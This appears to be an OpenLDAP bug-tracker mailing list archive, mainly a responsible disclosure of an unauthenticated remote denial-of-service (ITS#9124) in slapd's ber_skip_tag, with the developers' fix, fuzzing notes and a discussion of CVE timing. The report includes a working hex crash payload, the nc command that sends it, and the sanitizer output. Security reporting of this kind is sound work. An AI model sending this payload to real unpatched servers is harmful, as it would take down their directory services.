openldap-bugs November 2019

openldap-bugs@openldap.org

11 participants
35 discussions

Re: (ITS#9124) Unauthenticated remote denial-of-service (Null pointer dereference in ber_skip_tag)
by michael＠stroeder.com 29 Nov '19

29 Nov '19

On 11/29/19 1:06 PM, ondra(a)mistotebe.net wrote: > thanks for the report, this should be fixed by commit > 1dbf0e9441def3d6dbc0fa8fba3c2e86fa50fa19 in master. Will this fix be added to 2.4.49 and when? Ciao, Michael.

1 0

Re: (ITS#9124) Unauthenticated remote denial-of-service (Null pointer dereference in ber_skip_tag)
by stephan＠srlabs.de 29 Nov '19

29 Nov '19

--Apple-Mail-A7F46F22-1F3F-4DFD-A65F-8D3B7CB2FC27 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: base64 V2lsbCB1c2UgdGhlIE1ham9yIFNlY3VyaXR5IGlzc3VlIGJ1dHRvbiBuZXh0IHRpbWUuIEFsc28s IEkgd2lsbCB3YWl0IHdpdGggQ1ZFIElEIHJlcXVlc3QgdW50aWwgYSBuZXcgcmVsZWFzZSBpbmNs dWRpbmcgdGhlIGJ1ZyBmaXgoZXMpIGlzIGF2YWlsYWJsZS4gUGxlYXNlIGxldCBtZSBrbm93IHdo ZW4gdGhlIG5ldyByZWxlYXNlIGlzIHJlYWR5Lg0KDQpDaGVlcnMNCiAgICAtU3RlcGhhbg0KDQo+ IE9uIDI5LiBOb3YgMjAxOSwgYXQgMTY6NTAsIEhvd2FyZCBDaHUgPGh5Y0BzeW1hcy5jb20+IHdy b3RlOg0KPiANCj4g77u/c3RlcGhhbkBzcmxhYnMuZGUgd3JvdGU6DQo+PiBOb3RlOiBBZnRlciBD eXJ1cyBTQVNMIGZpeGVzIHRoZSBvdGhlciBpc3N1ZSAjOTEyMywgSSB3aWxsIHJlcXVlc3QgQ1ZF IGlkPQ0KPj4gJ3MgZm9yIHRoZSB0d28gYnVncyBhbmQgc2hhcmUgdGhlbSBhcyBhIHJlZmVyZW5j ZSBpbiB0aGUgcmVsZXZhbnQgaXNzdWVzID0NCj4+ICgjOTEyMywgIzkxMjQpDQo+IA0KPiBVc3Vh bCBwcmFjdGljZSBmb3IgQ1ZFcyBpcyBub3QgdG8gbWFrZSB0aGVtIHB1YmxpYyB1bnRpbCBmaXhl cyBhcmUgcmVsZWFzZWQuIEluIHRoZQ0KPiBmdXR1cmUsIHlvdSBzaG91bGQgdGljayB0aGUgTWFq b3IgU2VjdXJpdHkgSXNzdWUgYnV0dG9uIGZvciBwb3RlbnRpYWwgQ1ZFcyBzbyB0aGV5DQo+IGNh biBiZSBoYW5kbGVkIHByaXZhdGVseSBiZWZvcmUgcmVsZWFzZS4NCj4gDQo+IC0tIA0KPiAgLS0g SG93YXJkIENodQ0KPiAgQ1RPLCBTeW1hcyBDb3JwLiAgICAgICAgICAgaHR0cDovL3d3dy5zeW1h cy5jb20NCj4gIERpcmVjdG9yLCBIaWdobGFuZCBTdW4gICAgIGh0dHA6Ly9oaWdobGFuZHN1bi5j b20vaHljLw0KPiAgQ2hpZWYgQXJjaGl0ZWN0LCBPcGVuTERBUCAgaHR0cDovL3d3dy5vcGVubGRh cC5vcmcvcHJvamVjdC8NCg== --Apple-Mail-A7F46F22-1F3F-4DFD-A65F-8D3B7CB2FC27 Content-Type: application/pkcs7-signature; name=smime.p7s Content-Disposition: attachment; filename=smime.p7s Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFADCABgkqhkiG9w0BBwEAAKCCBU8w ggVLMIIEM6ADAgECAhBcqlOYsUipXhgfVtj/CAUVMA0GCSqGSIb3DQEBCwUAMIGCMQswCQYDVQQG EwJJVDEPMA0GA1UECAwGTWlsYW5vMQ8wDQYDVQQHDAZNaWxhbm8xIzAhBgNVBAoMGkFjdGFsaXMg Uy5wLkEuLzAzMzU4NTIwOTY3MSwwKgYDVQQDDCNBY3RhbGlzIENsaWVudCBBdXRoZW50aWNhdGlv biBDQSBHMTAeFw0xOTA1MjQwODA3MTdaFw0yMDA1MjQwODA3MTdaMBwxGjAYBgNVBAMMEXN0ZXBo YW5Ac3JsYWJzLmRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAmniYbaUHSdjBF3/m +2PVN14GEGxOSwHtd8WxH9mUXKEIW4XuImwNz8AoGfFOHc4DA1Tc/an6lONwAeBgj541N7aKSTxR phKnrJrpJarbUR2FM7u7Km7btUTBT9mm6OmympB+vWKaGkjQo2Gr3GRSfVDNLP/n70H8uthbgwPL uBfBt/dLHFrvYBpPtnH2EQqKc1SELSUPAuo9zaO/ohwPb7Sss3vMOOtePGL0lcHjWCbdsstZ/DUz ek9MQ6F+PkGYee3JSzvyXvrADheqUPHtYPd2LPu6hZKbAGjoqRYHVbwITZIzu7QWB4YEXFCdMT6X Ide5lvA0zR7hhb63HKUVewIDAQABo4ICIDCCAhwwDAYDVR0TAQH/BAIwADAfBgNVHSMEGDAWgBR+ YPz4bKc9Pdeuk6F5Ao+zdCk79TBLBggrBgEFBQcBAQQ/MD0wOwYIKwYBBQUHMAKGL2h0dHA6Ly9j YWNlcnQuYWN0YWxpcy5pdC9jZXJ0cy9hY3RhbGlzLWF1dGNsaWcxMBwGA1UdEQQVMBOBEXN0ZXBo YW5Ac3JsYWJzLmRlMEcGA1UdIARAMD4wPAYGK4EfARgBMDIwMAYIKwYBBQUHAgEWJGh0dHBzOi8v d3d3LmFjdGFsaXMuaXQvYXJlYS1kb3dubG9hZDAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUH AwQwgegGA1UdHwSB4DCB3TCBm6CBmKCBlYaBkmxkYXA6Ly9sZGFwMDUuYWN0YWxpcy5pdC9jbiUz ZEFjdGFsaXMlMjBDbGllbnQlMjBBdXRoZW50aWNhdGlvbiUyMENBJTIwRzEsbyUzZEFjdGFsaXMl MjBTLnAuQS4vMDMzNTg1MjA5NjcsYyUzZElUP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q7Ymlu YXJ5MD2gO6A5hjdodHRwOi8vY3JsMDUuYWN0YWxpcy5pdC9SZXBvc2l0b3J5L0FVVEhDTC1HMS9n ZXRMYXN0Q1JMMB0GA1UdDgQWBBSM25yar8W0HyQ52pQLvwam2PQI1zAOBgNVHQ8BAf8EBAMCBaAw DQYJKoZIhvcNAQELBQADggEBADvK449WtB/GFtNr0TNrTnaNbtSuPz5poGt7nyUbneGYazzxvjBP I0a0A+h/++rHcAuYrCNP+/M0PWU3Jv4IDf6YwHGRQdXN4f9xhCtmBnFtfQ229anlEBvLZv5uEQSz Z6qhvZkqnq9WQ/ofb9q2GGwPfKa+QM4T8QFv5ZmogdXriH3gf4gJ1fbW7Ig33y+xYXr8W4lQ3haA ShGzV/FleypHafb/3ptGWNq3+diGKPxNpyU1BMq904OPAEBMCa5i8+8kYsT8ug+t2uSqboWrutgr /y4bYxBrY56cdfgnLBqoHPEBkg8ONHMgiULphoOelPbOjHD0by5aiDvNToIkdX4xggOIMIIDhAIB ATCBlzCBgjELMAkGA1UEBhMCSVQxDzANBgNVBAgMBk1pbGFubzEPMA0GA1UEBwwGTWlsYW5vMSMw IQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1ODUyMDk2NzEsMCoGA1UEAwwjQWN0YWxpcyBDbGll bnQgQXV0aGVudGljYXRpb24gQ0EgRzECEFyqU5ixSKleGB9W2P8IBRUwDQYJYIZIAWUDBAIBBQCg ggHBMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTE5MTEyOTE2MDgy N1owLwYJKoZIhvcNAQkEMSIEIP3CztgLxmwa4dtGsPyVGK0Uu2reBGyuXGbCQ2TxWLdEMIGoBgkr BgEEAYI3EAQxgZowgZcwgYIxCzAJBgNVBAYTAklUMQ8wDQYDVQQIDAZNaWxhbm8xDzANBgNVBAcM Bk1pbGFubzEjMCEGA1UECgwaQWN0YWxpcyBTLnAuQS4vMDMzNTg1MjA5NjcxLDAqBgNVBAMMI0Fj dGFsaXMgQ2xpZW50IEF1dGhlbnRpY2F0aW9uIENBIEcxAhBcqlOYsUipXhgfVtj/CAUVMIGqBgsq hkiG9w0BCRACCzGBmqCBlzCBgjELMAkGA1UEBhMCSVQxDzANBgNVBAgMBk1pbGFubzEPMA0GA1UE BwwGTWlsYW5vMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1ODUyMDk2NzEsMCoGA1UEAwwj QWN0YWxpcyBDbGllbnQgQXV0aGVudGljYXRpb24gQ0EgRzECEFyqU5ixSKleGB9W2P8IBRUwDQYJ KoZIhvcNAQEBBQAEggEAg+2zoDEhEy/p+izbCvXUOo0c/2HTHZsd6QvvSN/+gW5YNBEavqnvotEK cYYUNmX5RQP6Zyg/rnsK1jatSz1Bvxf7d20+XWK+1+Nt+PGztyreTBRHabdsns/AO3qoHomJ6m84 hA3hvz4k1kacGwTc+aqLy136Qd6cIoGlsVv2kVPdbTabntbm9aG199m24QHU2Sp2JJOEheLkr3+s wFzi3Df53zn9juhUoc/5JwkxvTyyGuWM8FOLYDfxVtjS2hd1KtooyKox4dwahwmn8aMCTU4yjBC4 2Z7GeVZ/RgeoXpzs1aB9je7b4R+XyGQimNRpQWu44y68/j4cu5pl1oiZ8gAAAAAAAA== --Apple-Mail-A7F46F22-1F3F-4DFD-A65F-8D3B7CB2FC27--

1 0

Re: (ITS#9124) Unauthenticated remote denial-of-service (Null pointer dereference in ber_skip_tag)
by hyc＠symas.com 29 Nov '19

29 Nov '19

stephan(a)srlabs.de wrote: > Note: After Cyrus SASL fixes the other issue #9123, I will request CVE id= > 's for the two bugs and share them as a reference in the relevant issues = > (#9123, #9124) Usual practice for CVEs is not to make them public until fixes are released. In the future, you should tick the Major Security Issue button for potential CVEs so they can be handled privately before release. -- -- Howard Chu CTO, Symas Corp. http://www.symas.com Director, Highland Sun http://highlandsun.com/hyc/ Chief Architect, OpenLDAP http://www.openldap.org/project/

1 0

Re: (ITS#9124) Unauthenticated remote denial-of-service (Null pointer dereference in ber_skip_tag)
by stephan＠srlabs.de 29 Nov '19

29 Nov '19

--------------ms020107020804030202050609 Content-Type: multipart/mixed; boundary="------------B39567B16EE4CE18797C4253" Content-Language: en-US This is a multi-part message in MIME format. --------------B39567B16EE4CE18797C4253 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable Hi Ond=C5=99ej =E2=80=94 The commit 1dbf0e9441def3d6dbc0fa8fba3c2e86fa50fa19 seems to fix the null= pointer dereference issue. Using honggfuzz netdriver module, fuzzing of slapd can be accomplished re= latively easy. You can follow the below instructions to fuzz the server: 1. Install honggfuzz (stable) $ export CC=3Dhfuzz-clang $ export CXX=3Dhfuzz-clang++ 2. Apply attached patch (fuzz.patch) 3. Compile openldap $ ./configure $ make depend $ make $ make install 4. Create testcase directory including seeds (probably you have way bette= r seeds then I have :), I just used ldap payloads extracted from some pca= p's) $ mkdir testcases 5. Start fuzzing $ HFND_TCP_PORT=3D9090 honggfuzz -w ldap.wordlist -f testcases/ -- ./libe= xec/slapd -d 1 -h ldap://127.0.0.1:9090 As you see, the fuzzing setup is relatively simple thanks to honggfuzz. Hope this helps! Note: After Cyrus SASL fixes the other issue #9123, I will request CVE id= 's for the two bugs and share them as a reference in the relevant issues = (#9123, #9124) Cheers =C2=A0=C2=A0=C2=A0 -Stephan On 11/29/19 1:06 PM, Ond=C5=99ej Kuzn=C3=ADk wrote: > On Fri, Nov 29, 2019 at 09:08:15AM +0000, stephan(a)srlabs.de wrote: >> Unauthenticated remote denial-of-service through malformed ldap packet= >> caused by a null pointer dereference in ber_skip_tag function >> (libraries/liblber/decode.c). >> >> =3D=3D4066091=3D=3D by 0x4FD051: cancel_extop (cancel.c:52) > Hi Stephan, > thanks for the report, this should be fixed by commit > 1dbf0e9441def3d6dbc0fa8fba3c2e86fa50fa19 in master. > > Looks like you are fuzzing the server which has been on my to do list > for a while, many thanks for that and I'm looking forward to reading > how you did it. Would you be willing to help the project integrate your= > work in its testing process after you've finished? > > Thanks, > --------------B39567B16EE4CE18797C4253 Content-Type: text/x-patch; charset=UTF-8; name="fuzz.patch" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="fuzz.patch" diff --git a/servers/slapd/main.c b/servers/slapd/main.c index f528aa951..1941ae3de 100644 --- a/servers/slapd/main.c +++ b/servers/slapd/main.c @@ -349,12 +349,14 @@ usage( char *name ) ); } =20 -#ifdef HAVE_NT_SERVICE_MANAGER -void WINAPI ServiceMain( DWORD argc, LPTSTR *argv ) +//#ifdef HAVE_NT_SERVICE_MANAGER +//void WINAPI ServiceMain( DWORD argc, LPTSTR *argv ) +//#else +#ifdef HFND_FUZZING_ENTRY_FUNCTION +HFND_FUZZING_ENTRY_FUNCTION(int argc, char **argv) { #else -int main( int argc, char **argv ) +int main( int argc, char **argv ) { #endif -{ int i, no_detach =3D 0; int rc =3D 1; char *urls =3D NULL; --------------B39567B16EE4CE18797C4253-- --------------ms020107020804030202050609 Content-Type: application/pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Cryptographic Signature MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFADCABgkqhkiG9w0BBwEAAKCC C5owggVLMIIEM6ADAgECAhBcqlOYsUipXhgfVtj/CAUVMA0GCSqGSIb3DQEBCwUAMIGCMQsw CQYDVQQGEwJJVDEPMA0GA1UECAwGTWlsYW5vMQ8wDQYDVQQHDAZNaWxhbm8xIzAhBgNVBAoM GkFjdGFsaXMgUy5wLkEuLzAzMzU4NTIwOTY3MSwwKgYDVQQDDCNBY3RhbGlzIENsaWVudCBB dXRoZW50aWNhdGlvbiBDQSBHMTAeFw0xOTA1MjQwODA3MTdaFw0yMDA1MjQwODA3MTdaMBwx GjAYBgNVBAMMEXN0ZXBoYW5Ac3JsYWJzLmRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB CgKCAQEAmniYbaUHSdjBF3/m+2PVN14GEGxOSwHtd8WxH9mUXKEIW4XuImwNz8AoGfFOHc4D A1Tc/an6lONwAeBgj541N7aKSTxRphKnrJrpJarbUR2FM7u7Km7btUTBT9mm6OmympB+vWKa GkjQo2Gr3GRSfVDNLP/n70H8uthbgwPLuBfBt/dLHFrvYBpPtnH2EQqKc1SELSUPAuo9zaO/ ohwPb7Sss3vMOOtePGL0lcHjWCbdsstZ/DUzek9MQ6F+PkGYee3JSzvyXvrADheqUPHtYPd2 LPu6hZKbAGjoqRYHVbwITZIzu7QWB4YEXFCdMT6XIde5lvA0zR7hhb63HKUVewIDAQABo4IC IDCCAhwwDAYDVR0TAQH/BAIwADAfBgNVHSMEGDAWgBR+YPz4bKc9Pdeuk6F5Ao+zdCk79TBL BggrBgEFBQcBAQQ/MD0wOwYIKwYBBQUHMAKGL2h0dHA6Ly9jYWNlcnQuYWN0YWxpcy5pdC9j ZXJ0cy9hY3RhbGlzLWF1dGNsaWcxMBwGA1UdEQQVMBOBEXN0ZXBoYW5Ac3JsYWJzLmRlMEcG A1UdIARAMD4wPAYGK4EfARgBMDIwMAYIKwYBBQUHAgEWJGh0dHBzOi8vd3d3LmFjdGFsaXMu aXQvYXJlYS1kb3dubG9hZDAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwQwgegGA1Ud HwSB4DCB3TCBm6CBmKCBlYaBkmxkYXA6Ly9sZGFwMDUuYWN0YWxpcy5pdC9jbiUzZEFjdGFs aXMlMjBDbGllbnQlMjBBdXRoZW50aWNhdGlvbiUyMENBJTIwRzEsbyUzZEFjdGFsaXMlMjBT LnAuQS4vMDMzNTg1MjA5NjcsYyUzZElUP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q7Ymlu YXJ5MD2gO6A5hjdodHRwOi8vY3JsMDUuYWN0YWxpcy5pdC9SZXBvc2l0b3J5L0FVVEhDTC1H MS9nZXRMYXN0Q1JMMB0GA1UdDgQWBBSM25yar8W0HyQ52pQLvwam2PQI1zAOBgNVHQ8BAf8E BAMCBaAwDQYJKoZIhvcNAQELBQADggEBADvK449WtB/GFtNr0TNrTnaNbtSuPz5poGt7nyUb neGYazzxvjBPI0a0A+h/++rHcAuYrCNP+/M0PWU3Jv4IDf6YwHGRQdXN4f9xhCtmBnFtfQ22 9anlEBvLZv5uEQSzZ6qhvZkqnq9WQ/ofb9q2GGwPfKa+QM4T8QFv5ZmogdXriH3gf4gJ1fbW 7Ig33y+xYXr8W4lQ3haAShGzV/FleypHafb/3ptGWNq3+diGKPxNpyU1BMq904OPAEBMCa5i 8+8kYsT8ug+t2uSqboWrutgr/y4bYxBrY56cdfgnLBqoHPEBkg8ONHMgiULphoOelPbOjHD0 by5aiDvNToIkdX4wggZHMIIEL6ADAgECAggs1IrTsR4PiTANBgkqhkiG9w0BAQsFADBrMQsw CQYDVQQGEwJJVDEOMAwGA1UEBwwFTWlsYW4xIzAhBgNVBAoMGkFjdGFsaXMgUy5wLkEuLzAz MzU4NTIwOTY3MScwJQYDVQQDDB5BY3RhbGlzIEF1dGhlbnRpY2F0aW9uIFJvb3QgQ0EwHhcN MTUwNTE0MDcxNDE1WhcNMzAwNTE0MDcxNDE1WjCBgjELMAkGA1UEBhMCSVQxDzANBgNVBAgM Bk1pbGFubzEPMA0GA1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1 ODUyMDk2NzEsMCoGA1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVudGljYXRpb24gQ0EgRzEw ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDA/MGJVtmI4vQEZb/NCTWrKCkw/gzK 9yerHBHuhj1d5PVsRLYMVzOVl96Iio0tqduTKpPHJ1dn6TGhL3TvWpaxnrNL6nFKpcuz5FO+ d0RpbHmF0dlwo1YbOHLkWI7gZm8aUUicUSJpj504SmONa9J5em9wOmdjDoz0Be4ejgmGMLc/ 84r//lAVefO1NriJTrpGku145OAK2JELBk0rHwQV6qp9Oli98Rvgf3UTuf5jrWObR3YTx8nb AZNpJLCNzydMjYCle6OhzO6RvaQerBoY/erlS551ZydFlzrldSEr9norfYq+tC40/fYX/kzG S8QOcmlSee32IwTG8TOffXMNAgMBAAGjggHVMIIB0TBBBggrBgEFBQcBAQQ1MDMwMQYIKwYB BQUHMAGGJWh0dHA6Ly9vY3NwMDUuYWN0YWxpcy5pdC9WQS9BVVRILVJPT1QwHQYDVR0OBBYE FH5g/Phspz09166ToXkCj7N0KTv1MA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAUUtiI OsifeGbtifN7OHCUyQICNtAwRQYDVR0gBD4wPDA6BgRVHSAAMDIwMAYIKwYBBQUHAgEWJGh0 dHBzOi8vd3d3LmFjdGFsaXMuaXQvYXJlYS1kb3dubG9hZDCB4wYDVR0fBIHbMIHYMIGWoIGT oIGQhoGNbGRhcDovL2xkYXAwNS5hY3RhbGlzLml0L2NuJTNkQWN0YWxpcyUyMEF1dGhlbnRp Y2F0aW9uJTIwUm9vdCUyMENBLG8lM2RBY3RhbGlzJTIwUy5wLkEuJTJmMDMzNTg1MjA5Njcs YyUzZElUP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q7YmluYXJ5MD2gO6A5hjdodHRwOi8v Y3JsMDUuYWN0YWxpcy5pdC9SZXBvc2l0b3J5L0FVVEgtUk9PVC9nZXRMYXN0Q1JMMA4GA1Ud DwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEATZPO1SS+QRtKFlhzX2WJ8tl6PliMvMvE D+VbFmeywUukM/JJ/Myad3PcXTpLnWW3AN75uVPByl3NSXczZqUofds6vznmS71Gvq553Jr4 cZBRPQ6GoOjYrYIAT2cFx8A3GJ+N9PxfMKgLdy1/27HeiDVa4TxZNwtkqAIy41EGYm170LhS DTDeJeo/Orwq5FGhs0qp10+OTcSIr5AD4QUIKRrXE4uH/tw8ZMkw21rX/S7mguJdo4Ad4Au3 +ep5naRn6WLMryhO/iKflq8h/d6Vregvq+vClNxrtNnFNf3R7zTl1lA3ipFU909usGVa02jM ftJ0t4utyg3yXYRc7rX3QYAlh3KdNzYToTKstUZwMpRf3VWYJJGuoSmlntbTlNtZEuLr7A+M DOZOrZdKYp9qOruO5MqCSTDsUUkHKLFrQ11Jmix1BvdWQuobwQ5g5qZkuof6/u5rT66WDsU6 +IVt5nthH15E7zU7wULW4uC62XIYPb4YuOBCey+d4Oxs0BZ+SivL6qoDG9XNfk9JpCnaknnY BogfUw3WLb+B5FI/zdNEysWTC4gzMOFfEoVC+myk1zX29xOvLOO3A/jGrRY1LhhY9LhT72Zb 5TQKCeyDH18yIk1st+V/mpJvnePcAYeeMr+onM9rf3AVNctcHrjwXfDVB/1Ht5l5NEl8JBj9 8lQxggP2MIID8gIBATCBlzCBgjELMAkGA1UEBhMCSVQxDzANBgNVBAgMBk1pbGFubzEPMA0G A1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1ODUyMDk2NzEsMCoG A1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVudGljYXRpb24gQ0EgRzECEFyqU5ixSKleGB9W 2P8IBRUwDQYJYIZIAWUDBAIBBQCgggIvMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJ KoZIhvcNAQkFMQ8XDTE5MTEyOTE0MTAwN1owLwYJKoZIhvcNAQkEMSIEIDrSxJxDsDDfl2Dd xIYYngVgXvUxdrKLkM1iWOnau/l4MGwGCSqGSIb3DQEJDzFfMF0wCwYJYIZIAWUDBAEqMAsG CWCGSAFlAwQBAjAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZIhvcNAwICAUAw BwYFKw4DAgcwDQYIKoZIhvcNAwICASgwgagGCSsGAQQBgjcQBDGBmjCBlzCBgjELMAkGA1UE BhMCSVQxDzANBgNVBAgMBk1pbGFubzEPMA0GA1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3Rh bGlzIFMucC5BLi8wMzM1ODUyMDk2NzEsMCoGA1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVu dGljYXRpb24gQ0EgRzECEFyqU5ixSKleGB9W2P8IBRUwgaoGCyqGSIb3DQEJEAILMYGaoIGX MIGCMQswCQYDVQQGEwJJVDEPMA0GA1UECAwGTWlsYW5vMQ8wDQYDVQQHDAZNaWxhbm8xIzAh BgNVBAoMGkFjdGFsaXMgUy5wLkEuLzAzMzU4NTIwOTY3MSwwKgYDVQQDDCNBY3RhbGlzIENs aWVudCBBdXRoZW50aWNhdGlvbiBDQSBHMQIQXKpTmLFIqV4YH1bY/wgFFTANBgkqhkiG9w0B AQEFAASCAQA9zDrxcLY4Ki274n/uD+urTRlasoNsnPmLUzyOVtR+ieq0ucB4w+cx+an6hFbT u6hnr40a88cUfyw4em6KKk5rXfsMM/fPJs1na9KPlnS1Dw9+HpSOERVavlJ1N/Vut9uqpqxc vXLgSdYB5LR1QF2PzAm7SLIWt5gIMjSvAJboWmt9/Dgc+cccbcyt5Th5wFcH5wHXt4xOSUQY e3aWRJGwTXv4WCqeSXE1zzOlQvJNamaD70U21MX6Lb3Nk4mqJ33G388kJfu6lIr7VhDQGl0f muENH+M5tPH0QzBRq1E6SmvcDh4iB4AlIMj4yWE/Uxl83QZ0XpJt3GpDdtJmsffKAAAAAAAA --------------ms020107020804030202050609--

1 0

Re: (ITS#9124) Unauthenticated remote denial-of-service (Null pointer dereference in ber_skip_tag)
by ondra＠mistotebe.net 29 Nov '19

29 Nov '19

On Fri, Nov 29, 2019 at 09:08:15AM +0000, stephan(a)srlabs.de wrote: > Unauthenticated remote denial-of-service through malformed ldap packet > caused by a null pointer dereference in ber_skip_tag function > (libraries/liblber/decode.c). > > ==4066091== by 0x4FD051: cancel_extop (cancel.c:52) Hi Stephan, thanks for the report, this should be fixed by commit 1dbf0e9441def3d6dbc0fa8fba3c2e86fa50fa19 in master. Looks like you are fuzzing the server which has been on my to do list for a while, many thanks for that and I'm looking forward to reading how you did it. Would you be willing to help the project integrate your work in its testing process after you've finished? Thanks, -- Ondřej Kuzník Senior Software Engineer Symas Corporation http://www.symas.com Packaged, certified, and supported LDAP solutions powered by OpenLDAP

1 0

(ITS#9124) Unauthenticated remote denial-of-service (Null pointer dereference in ber_skip_tag)
by stephan＠srlabs.de 29 Nov '19

29 Nov '19

Full_Name: Stephan Zeisberg Version: 2.4.48 OS: Fedora 31 (kernel 5.3.11-300.fc31.x86_64) URL: Submission from: (NULL) (217.228.59.1) # Issue description Unauthenticated remote denial-of-service through malformed ldap packet caused by a null pointer dereference in ber_skip_tag function (libraries/liblber/decode.c). # Version openldap-2.4.48.tgz # How to reproduce ## Compile $ tar xzvf openldap-2.4.48.tgz $ cd openldap-2.4.48 $ ./configure --prefix=/tmp/openldap $ make depend $ make $ make install $ cd /tmp/openldap ## Start server $ ./libexec/slapd -d 1 -h ldap://127.0.0.1:9091 ## Create PoC crash file $ echo -n "3084000000b902022da277072d0b312e332e362e312e312e38810038303132353339313934303339cb36352e2e2e2e2e2e2e2ec8a6134cba3e07b6bc691e2e79a9a3f6d0bb7b5d789a8be1058da4a448206401aadcc21bc939ba86a2f30c64f585b9e65fafb0a10d8427736b1bc0422868aa1fda601953d87aa638228bc4ae2dc2f85be810f282847bcab689fb75755eed809d8e284b647ee3c76b52bd6e309d4fa7a2437cf195f6682b4bd303d2de1654160613adb2744b9632515871278b01671ca5a8faf18f736964d34f8da5d40370ec68f2b68b47fe1f2b6d1a04359f54ad827ae21963768ef1f854e03f173e1f57c1b04c5b3dd2a736bb6ea159e5000000000000000272af3a4164acbf51b0b27c7d1ed9ce4b52b0a6b0a4d678fecd8112dd6c4d00" | xxd -r -p > ldap.crash ## Execute PoC (may need to be executed multiple times) $ nc 127.0.0.1 9091 < ldap.crash # Valgrind + UBSAN 5de0ddc3 connection_read(12): checking for input on id=1000 ber_get_next ber_scanf fmt ({i}) ber: ==4066091== Thread 3: ==4066091== Invalid read of size 1 ==4066091== at 0x63E1DF: ber_skip_tag (decode.c:256) ==4066091== by 0x63F7A8: ber_scanf (decode.c:865) ==4066091== by 0x4FD051: cancel_extop (cancel.c:52) ==4066091== by 0x4BE530: fe_extended (extended.c:222) ==4066091== by 0x4BE36B: do_extended (extended.c:177) ==4066091== by 0x472CA7: connection_operation (connection.c:1158) ==4066091== by 0x471331: connection_read_thread (connection.c:1294) ==4066091== by 0x5FEE79: ldap_int_thread_pool_wrapper (tpool.c:696) ==4066091== by 0xCA384E1: start_thread (in /usr/lib64/libpthread-2.30.so) ==4066091== by 0xCCC6692: clone (in /usr/lib64/libc-2.30.so) ==4066091== Address 0x0 is not stack'd, malloc'd or (recently) free'd ==4066091== UndefinedBehaviorSanitizer5de0ddc3 ber_get_next on fd 12 failed errno=0 (Success) :DEADLYSIGNAL ==4066091==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000063e1df bp 0x00004ee77660 sp 0x00004ee77640 T4066125) ==4066091==The signal is caused by a READ memory access. ==4066091==Hint: address points to the zero page. ==4066129== Warning: invalid file descriptor 1024 in syscall close() #0 0x63e1de in ber_skip_tag /tmp/openldap-2.4.48/libraries/liblber/decode.c:255:15 #1 0x63f7a8 in ber_scanf /tmp/openldap-2.4.48/libraries/liblber/decode.c:865:10 #2 0x4fd051 in cancel_extop /tmp/openldap-2.4.48/servers/slapd/cancel.c:52:7 #3 0x4be530 in fe_extended /tmp/openldap-2.4.48/servers/slapd/extended.c:222:16 #4 0x4be36b in do_extended /tmp/openldap-2.4.48/servers/slapd/extended.c:177:15 #5 0x472ca7 in connection_operation /tmp/openldap-2.4.48/servers/slapd/connection.c:1158:7 #6 0x471331 in connection_read_thread /tmp/openldap-2.4.48/servers/slapd/connection.c:1294:14 #7 0x5fee79 in ldap_int_thread_pool_wrapper /tmp/openldap-2.4.48/libraries/libldap_r/tpool.c:696:3 #8 0xca384e1 in start_thread (/lib64/libpthread.so.0+0x94e1) #9 0xccc6692 in clone (/lib64/libc.so.6+0x101692) UndefinedBehaviorSanitizer can not provide additional info. Please let me know what additional information I can provide to successfully reproduce the issue. Note: I have also tested and reproduced the issue using the precompiled package from the Fedora repositories: openldap-servers-2.4.47-3.fc31.x86_64 (OpenLDAP: slapd 2.4.47 (Jul 25 2019 00:00:00)) -Stephan Zeisberg

1 0

Re: (ITS#9120) Searches including generalizedTime attributes with index
by hyc＠symas.com 28 Nov '19

28 Nov '19

Howard Chu wrote: > Howard Chu wrote: >> markus.widmer(a)daasi.de wrote: > >>> We could reproduce this with 2.4.42, 2.4.44 and 2.4.48. We hope you can >>> reproduce this as well to see what is happening here. >> >> Yes, can reproduce this. The function that converts a component-wise time >> into a timet is referencing time since 1970. The date in 1956 would yield a >> negative timet value but the fields are unsigned ints, so instead it's treated >> as 17,000 years in the future. We can probably change this to handle signed >> timestamps but need to consider this further. >> > I believe the best way forward would be to allow signed values, and also to switch > our epoch reference from 1970-01-01 to 0000-01-01 (i.e., use Gregorian Proleptic calendar). > Year zero would be 1 BCE in this calendar, and anything earlier would be a negative year. > > Changing these functions will require regenerating any indices. Looks like something > we'll rewrite for 2.5 but leave 2.4 alone. Fixed in git master commit 97c145919d8c702003b9cd8bac0e01083d3ab9a1 The time is now calculated with signed years, but the result is still returned as an unsigned value (with negative years properly sorting as less than positive years). Note that the slapd schema validator still rejects negative years at the moment. Will need to look further at that later. -- -- Howard Chu CTO, Symas Corp. http://www.symas.com Director, Highland Sun 